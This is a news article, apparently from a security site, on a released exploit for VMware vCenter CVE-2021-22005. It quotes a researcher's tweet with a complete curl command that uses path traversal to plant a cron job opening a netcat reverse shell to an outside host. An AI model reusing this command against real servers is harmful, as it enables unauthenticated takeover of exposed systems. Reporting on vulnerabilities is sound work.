A working exploit for the Remote Code Execution (RCE) vulnerability in VMware vCenter tracked as CVE-2021-22005 has been publicly released. According to security experts, the bug is already exploited by hackers.
A Different Exploit
The exploit, released this week by a security expert at Rapid7, differs from the PoC exploit that began to circulate last week. This version can be used to open a reverse shell on an exposed server, enabling a threat actor to perform arbitrary code.
According to experts, the RCE flaw enables an unauthenticated, remote attacker to upload files to the vCenter Server analytics service.
Complete Exploit in Reserve
The Rapid7 expert said in a tweet that the PoC exploit for CVE-2021-22005 works against endpoints in servers that have the Customer Experience Improvement Program (CEIP) component enabled.
CVE-2021-22005: Exploitation in the wild confirmed. Unredacted RCE PoC against CEIP below.
curl -kv “https://172.16.57.2/analytics/telemetry/ph/api/hyper/send?_c=&_i=/../../../../../../etc/cron.d/$RANDOM” -H Content-Type: -d “* * * * * root nc -e /bin/sh 172.16.57.1 4444” https://t.co/wi08brjl3r pic.twitter.com/bwjMA21ifA
— wvu (@wvuuuuuuuuuuuuu) September 27, 2021
This vulnerability can be used by anyone who can reach vCenter Server over the network to gain access, regardless of the configuration settings of vCenter Server.
As mentioned by BleepingComputer, the